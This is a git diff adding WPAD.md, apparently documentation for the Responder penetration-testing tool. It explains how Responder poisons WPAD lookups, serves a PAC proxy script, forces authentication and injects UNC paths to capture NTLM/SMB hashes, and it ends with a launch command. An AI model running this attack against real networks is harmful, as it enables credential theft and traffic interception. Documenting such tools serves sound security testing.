diff --git a/WPAD.md b/WPAD.md new file mode 100644 index 0000000..39df5ef --- /dev/null +++ b/WPAD.md @@ -0,0 +1,42 @@ +# Responder WPAD Server + +WPAD stands for Web Proxy Auto-Discovery or Proxy Auto-Configuration (PAC). + +This protocol was implemented on Internet Explorer 5.0, and the concept is to auto-configure local proxy servers on the user browser. + +There is several way to configure a WPAD: +* Manually insert a WPAD server in IE -> Options -> Connection Settings -> Lan Settings. +* DHCP options 252. +* Multicast/Broadcast WPAD lookup. + +Responder takes advantage of that and effectively poison WPAD broadcast/multicast queries and redirect the victim browser to its WPAD server. + +Here there is two scenario: +* Force authentication when serving the WPAD file (Responder switch -F) and grab hash. + * Once the authentication has been grabbed, all browser request will be proxy-ed by Responder. +* Just serve the file, then proxy all browser requests. + +Responder WPAD script is specified in Responder.conf and should be changed for your needs (at least the hardcoded name "ProxySrv"): +> WPADScript = + function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';} + +This function contains the following directives: + +* Use a proxy server for all connections. + +* Responder proxy server is set to ProxySrv:3141 and ProxySrv:3128 + +* For any *.ProxySrv requests or if the request is for localhost/127.0.0.1, don't use the proxy. + +* If this proxy server fails for whatever reason, then access the website directly. + +Once the requests goes through Responder proxy, a UNC inside a tag is inserted on all requests to grab SMB hashes. +This payload can be changed in Responder.conf with the setting "HTMLToInject =". + +Responder WPAD proxy server gets activated by providing the "-w" command line switch. + +Forcing WPAD file authentication is with the "-F" command line switch. + +Example: + + ./Responder.py -I eth0 -rFwv